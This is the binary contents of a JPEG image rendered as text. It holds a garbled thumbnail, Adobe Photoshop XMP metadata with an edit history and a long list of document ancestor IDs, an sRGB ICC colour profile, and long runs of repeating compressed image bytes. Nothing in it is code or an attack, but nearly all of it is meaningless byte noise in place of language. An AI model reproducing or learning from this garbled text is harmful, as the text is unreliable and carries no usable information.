          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stRef:documentID="adobe:docid:photoshop:7dbf3126-d713-a744-8bcc-86ce4a28f7ad" stRef:originalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>130277488</rdf:li> <rdf:li>141194698</rdf:li> <rdf:li>145150258</rdf:li> <rdf:li>167191953</rdf:li> <rdf:li>176341593</rdf:li> <rdf:li>178977234</rdf:li> <rdf:li>182272822</rdf:li> <rdf:li>192261204</rdf:li> <rdf:li>193438474</rdf:li> <rdf:li>195689250</rdf:li> <rdf:li>196294602</rdf:li> <rdf:li>228083377</rdf:li> <rdf:li>242265558</rdf:li> <rdf:li>3C195ED08DD181C1E70D74058088D923</rdf:li> <rdf:li>51124270</rdf:li> <rdf:li>55EBD6896B155197C00F14AE15DD5833</rdf:li> <rdf:li>6A0A15811A8FC9AC3A16B564BD642F8C</rdf:li> <rdf:li>73579908</rdf:li> <rdf:li>786951C7142A2AEC38D5A5004E40A752</rdf:li> <rdf:li>85C0BB87BEAE9829B22F9F7DDC288118</rdf:li> <rdf:li>98849039</rdf:li> <rdf:li>A5AC77993D83A50F34AA7C4E8A6D5DC7</rdf:li> <rdf:li>F33669D08BFCBD95F06E1D6DC8085223</rdf:li> <rdf:li>adobe:docid:photoshop:2aadf570-db10-11e5-8cd7-df40e3f5c0ff</rdf:li> <rdf:li>adobe:docid:photoshop:3ad2bde0-36da-11e5-aba8-c6c7ea128f87</rdf:li> <rdf:li>adobe:docid:photoshop:3ae55549-2f11-11e5-8a1e-cca3aa3b1f5b</rdf:li> <rdf:li>adobe:docid:photoshop:46ec2593-3be2-11e5-a44f-893b6bacb806</rdf:li> <rdf:li>adobe:docid:photoshop:59185ead-ccc4-1179-9470-fe1407c09860</rdf:li> <rdf:li>adobe:docid:photoshop:5d4ca717-565e-11e5-83d9-96afab01fb7d</rdf:li> <rdf:li>adobe:docid:photoshop:7e1015e9-5bcf-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:7f36621b-addc-11e7-aea5-b4dbe1565c8e</rdf:li> <rdf:li>adobe:docid:photoshop:9510e559-2cae-11e5-a749-d8deb76636bb</rdf:li> <rdf:li>adobe:docid:photoshop:99221731-5be2-294d-9926-ec33347c3f79</rdf:li> <rdf:li>adobe:docid:photoshop:a1d8d42c-8aec-117a-9ce0-d85f44e8821b</rdf:li> <rdf:li>adobe:docid:photoshop:d04f7fa4-5c13-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:df2f204d-b651-11e5-bb8e-99bbec9e1c45</rdf:li> <rdf:li>adobe:docid:photoshop:f188381e-5d62-11e5-a1c8-dc3a58737c37</rdf:li> <rdf:li>uuid:2CDD2D0EC944DF11BBB8F27D9F6841CA</rdf:li> <rdf:li>uuid:D670922B660CE611ADAB93AF422C66D6</rdf:li> <rdf:li>xmp.did:0093BA7511206811B1DAAEADD64F896A</rdf:li> <rdf:li>xmp.did:018011740720681180E5B75AA0F739E5</rdf:li> <rdf:li>xmp.did:0180117407206811871F80FDF2C3718E</rdf:li> <rdf:li>xmp.did:0180117407206811871FB6C01BE9F510</rdf:li> <rdf:li>xmp.did:0180117407206811871FBEC38D9105D7</rdf:li> <rdf:li>xmp.did:0180117407206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:0180117407206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:018011740720681188C683EA16CE491B</rdf:li> <rdf:li>xmp.did:018011740720681188C68D0E9FB08CA5</rdf:li> <rdf:li>xmp.did:018011740720681188C6C87AF92C64EF</rdf:li> <rdf:li>xmp.did:018011740720681192B0CDEAE74D693B</rdf:li> <rdf:li>xmp.did:028011740720681188C6AF0A6F7FE824</rdf:li> <rdf:li>xmp.did:028011740720681188C6C6A97910AC78</rdf:li> <rdf:li>xmp.did:0380117407206811871FB2718E5E8603</rdf:li> <rdf:li>xmp.did:03801174072068119109CACE15827097</rdf:li> <rdf:li>xmp.did:038011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:0480117407206811822AFC40E69A57D6</rdf:li> <rdf:li>xmp.did:04801174072068118C148D3FFC44F7CF</rdf:li> <rdf:li>xmp.did:0580117407206811871FF2DFC48F728E</rdf:li> <rdf:li>xmp.did:05801174072068118A6DDFE128CA40E1</rdf:li> <rdf:li>xmp.did:05801174072068118A6DF5A37A7EB4B7</rdf:li> <rdf:li>xmp.did:0680117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0680117407206811871FD9ADEBC05AC9</rdf:li> <rdf:li>xmp.did:0680117407206811BAA9C90DDE484AC6</rdf:li> <rdf:li>xmp.did:078011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:08801174072068118C14A81E3999D0D0</rdf:li> <rdf:li>xmp.did:0881930D1920681188C6B23E0DA3D9CA</rdf:li> <rdf:li>xmp.did:098011740720681188C6A094D1E6A3F9</rdf:li> <rdf:li>xmp.did:0A80117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0A80117407206811871FD969D92FB0E5</rdf:li> <rdf:li>xmp.did:0A8011740720681188C6D7A592EC9D69</rdf:li> <rdf:li>xmp.did:0A8011740720681192B0EAE56F792B85</rdf:li> <rdf:li>xmp.did:0e6875b8-543f-734c-9035-4a17948bcd0b</rdf:li> <rdf:li>xmp.did:131A06DA1020681188C69193806B1932</rdf:li> <rdf:li>xmp.did:175F8B652C206811871F9C3F3A8A1C0E</rdf:li> <rdf:li>xmp.did:19935B1B1220681197A5BE68DAE7D805</rdf:li> <rdf:li>xmp.did:1F4D49570D206811871FD1AC750C6933</rdf:li> <rdf:li>xmp.did:1F8418E30B20681188C6C166A936D6B2</rdf:li> <rdf:li>xmp.did:2218759B2920681192B0B98D384CD452</rdf:li> <rdf:li>xmp.did:22E7387B1020681188C6D82FD9EEA035</rdf:li> <rdf:li>xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00</rdf:li> <rdf:li>xmp.did:39EDD137112068118A6DD596BA142545</rdf:li> <rdf:li>xmp.did:420BC2ED4A206811871FB39F81FAECA2</rdf:li> <rdf:li>xmp.did:456DCAAC0A20681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:4A6880BA172068118A6DE215332FC54A</rdf:li> <rdf:li>xmp.did:4EC83EA60C206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:5A53435130206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:6b6c8a71-1c2a-4226-8a5b-05c8742922ca</rdf:li> <rdf:li>xmp.did:706982fc-7d98-40e8-af5c-34d725b5fae1</rdf:li> <rdf:li>xmp.did:707FC7D22F206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:748206EDA31DE9119725FED0EB7940B5</rdf:li> <rdf:li>xmp.did:76D4B8C310206811943DE82709197D15</rdf:li> <rdf:li>xmp.did:7911307E13206811871FC6751E16770B</rdf:li> <rdf:li>xmp.did:7D1099985A206811871F8776FCDA7166</rdf:li> <rdf:li>xmp.did:7DB3BE00292068118A6D84548B7B40A0</rdf:li> <rdf:li>xmp.did:81A7D5F82A206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:859F05911120681188C6C1527B0156A2</rdf:li> <rdf:li>xmp.did:863A0FC29F3AE811BD0DBED084B8F5A4</rdf:li> <rdf:li>xmp.did:867D40201F20681192B0BD9018AEE708</rdf:li> <rdf:li>xmp.did:8685A3F7322068119109C2E60CCDE007</rdf:li> <rdf:li>xmp.did:885D621F1720681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:9751854B10206811871FFB0658B2D2AF</rdf:li> <rdf:li>xmp.did:C1DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:C4DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:CDEFD3061220681192B0F75C6E6D61CB</rdf:li> <rdf:li>xmp.did:CF33DBC20D20681188C6F5FBAB6EEDBA</rdf:li> <rdf:li>xmp.did:D4B0CF55162068118C14B2857F8C4C6C</rdf:li> <rdf:li>xmp.did:E25EBE490A2068118C14EFCE47AE8D3F</rdf:li> <rdf:li>xmp.did:E71424F945206811A7BADFC90BDD9E59</rdf:li> <rdf:li>xmp.did:EA2E99433520681188C6819A55480162</rdf:li> <rdf:li>xmp.did:ECE9CB841020681192B0AC59354E4128</rdf:li> <rdf:li>xmp.did:F409F9F123206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:F4F6D7D84C20681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:F77F11740720681197CFB2669E13D7A6</rdf:li> <rdf:li>xmp.did:F866F6662B20681188C6CF690D9A65F5</rdf:li> <rdf:li>xmp.did:F8D31357D8A111E492B4A31594B6DD98</rdf:li> <rdf:li>xmp.did:FE7F11740720681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:da422971-04e3-d046-ad90-462cb7d1b2d0</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>ÿâXICC_PROFILEHLinomntrRGB XYZ Î	1acspMSFTIEC sRGBöÖÓ-HP  cprtP3desc„lwtptðbkptrXYZgXYZ,bXYZ@dmndTpdmddĈvuedL†viewÔ$lumiømeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ óQÌXYZ XYZ o¢8õXYZ b™·…ÚXYZ $ „¶ÏdescIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view¤þ_.ÏíÌ\žXYZ L	VPWçmeassig CRT curv
          #(-27;@EJOTY^chmrw|†‹•šŸ¤©®²·¼ÁÆËÐÕÛàåëðöû
          %+28>ELRY`gnu|ƒ‹’š¡©±¹ÁÉÑÙáéòú&/8AKT]gqz„Ž˜¢¬¶ÁËÕàëõ!-8COZfr~Š–¢®ºÇÓàìù -;HUcq~Œš¨¶ÄÓáðþ
          +:IXgw†–¦µÅÕåö'7HYj{Œ¯ÀÑãõ+=Oat†™¬¿Òåø2FZn‚–ª¾Òçû		%	:	O	d	y		¤	º	Ï	å	û
          
          '
          =
          T
          j
          
          ˜
          ®
          Å
          Ü
          ó"9Qi€˜°Èáù*C\uŽ§ÀÙó
          
          
          &
          @
          Z
          t
          Ž
          ©
          Ã
          Þ
          ø.Id›¶Òî	%A^z–³Ïì	&Ca~›¹×õ1OmŒªÉè&Ed„£Ãã#Ccƒ¤Åå'Ij‹­Îð4Vx›½à&Il²ÖúAe‰®Ò÷@eНÕú Ek‘·Ý*QwžÅì;cвÚ*R{£ÌõGp™Ãì@j”¾é>i”¿ê  A l ˜ Ä ð!!H!u!¡!Î!û"'"U"‚"¯"Ý#
          #8#f#”#Â#ð$$M$|$«$Ú%	%8%h%—%Ç%÷&'&W&‡&·&è''I'z'«'Ü(
          (?(q(¢(Ô))8)k))Ð**5*h*›*Ï++6+i++Ñ,,9,n,¢,×--A-v-«-á..L.‚.·.î/$/Z/‘/Ç/þ050l0¤0Û11J1‚1º1ò2*2c2›2Ô3
          3F33¸3ñ4+4e4ž4Ø55M5‡5Â5ý676r6®6é7$7`7œ7×88P8Œ8È99B99¼9ù:6:t:²:ï;-;k;ª;è<'<e<¤<ã="=a=¡=à> >`> >à?!?a?¢?â@#@d@¦@çA)AjA¬AîB0BrBµB÷C:C}CÀDDGDŠDÎEEUEšEÞF"FgF«FðG5G{GÀHHKH‘H×IIcI©IðJ7J}JÄKKSKšKâL*LrLºMMJM“MÜN%NnN·OOIO“OÝP'PqP»QQPQ›QæR1R|RÇSS_SªSöTBTTÛU(UuUÂVV\V©V÷WDW’WàX/X}XËYYiY¸ZZVZ¦Zõ[E[•[å\5\†\Ö]']x]É^^l^½__a_³``W`ª`üaOa¢aõbIbœbðcCc—cëd@d”dée=e’eçf=f’fèg=g“géh?h–hìiCišiñjHjŸj÷kOk§kÿlWl¯mm`m¹nnknÄooxoÑp+p†pàq:q•qðrKr¦ss]s¸ttptÌu(u…uáv>v›vøwVw³xxnxÌy*y‰yçzFz¥{{c{Â|!||á}A}¡~~b~Â#„å€G€¨
          kÍ‚0‚’‚ôƒWƒº„„€„ã…G…«††r†×‡;‡ŸˆˆiˆÎ‰3‰™‰þŠdŠÊ‹0‹–‹üŒcŒÊ1˜ÿŽfŽÎ6žnÖ‘?‘¨’’z’ã“M“¶” ”Š”ô•_•É–4–Ÿ—
          —u—à˜L˜¸™$™™üšhšÕ›B›¯œœ‰œ÷dÒž@ž®ŸŸ‹Ÿú i Ø¡G¡¶¢&¢–££v£æ¤V¤Ç¥8¥©¦¦‹¦ý§n§à¨R¨Ä©7©©ªª««u«é¬\¬Ð­D­¸®-®¡¯¯‹°°u°ê±`±Ö²K²Â³8³®´%´œµµŠ¶¶y¶ð·h·à¸Y¸Ñ¹J¹Âº;ºµ».»§¼!¼›½½¾
          ¾„¾ÿ¿z¿õÀpÀìÁgÁãÂ_ÂÛÃXÃÔÄQÄÎÅKÅÈÆFÆÃÇAÇ¿È=ȼÉ:ɹÊ8Ê·Ë6˶Ì5̵Í5͵Î6ζÏ7ϸÐ9кÑ<ѾÒ?ÒÁÓDÓÆÔIÔËÕNÕÑÖUÖØ×\×àØdØèÙlÙñÚvÚûۀÜ܊ÝݖÞÞ¢ß)߯à6à½áDáÌâSâÛãcãëäsäü儿
          æ–çç©è2è¼éFéÐê[êåëpëûì†ííœî(î´ï@ïÌðXðåñrñÿòŒóó§ô4ôÂõPõÞömöû÷Šøø¨ù8ùÇúWúçûwüü˜ý)ýºþKþÜÿmÿÿÿîAdobed@ÿۄÿÀv°ÿÝ–ÿÄ¢	
          	
          	u!"1A2#	QBa$3Rqb‘%C¡±ð&4r
          ÁÑ5'áS6‚ñ’¢DTsEF7Gc(UVW²ÂÒâòdƒt“„e£³ÃÓã)8fóu*9:HIJXYZghijvwxyz…†‡ˆ‰Š”•–—˜™š¤¥¦§¨©ª´µ¶·¸¹ºÄÅÆÇÈÉÊÔÕÖרÙÚäåæçèéêôõö÷øùúm!1"AQ2aqB#‘R¡b3	±$ÁÑCrðá‚4%’ScDñ¢²&5T6Ed'
          sƒ“FtÂÒâòUeuV7„…£³ÃÓãó)”¤´ÄÔäô•¥µÅÕåõ(GWf8v†–¦¶ÆÖæögw‡—§·Ç×ç÷HXhxˆ˜¨¸ÈØèø9IYiy‰™©¹ÉÙéù*:JZjzŠšªºÊÚêúÿÚ?Ù_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷suW_ÎÔ{Ç~í¬z¨gÆTd¢›,ˆÀ2»â©>ã"ˆàðÆ ãÚëm³p¼­­Ó֘ý¦ƒùõ`¬xƒ¯önþ9ÿÏÏÆç£sõ“Úßêæõÿ(-þô¿ô[ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðô½ÚßÔ{öª:
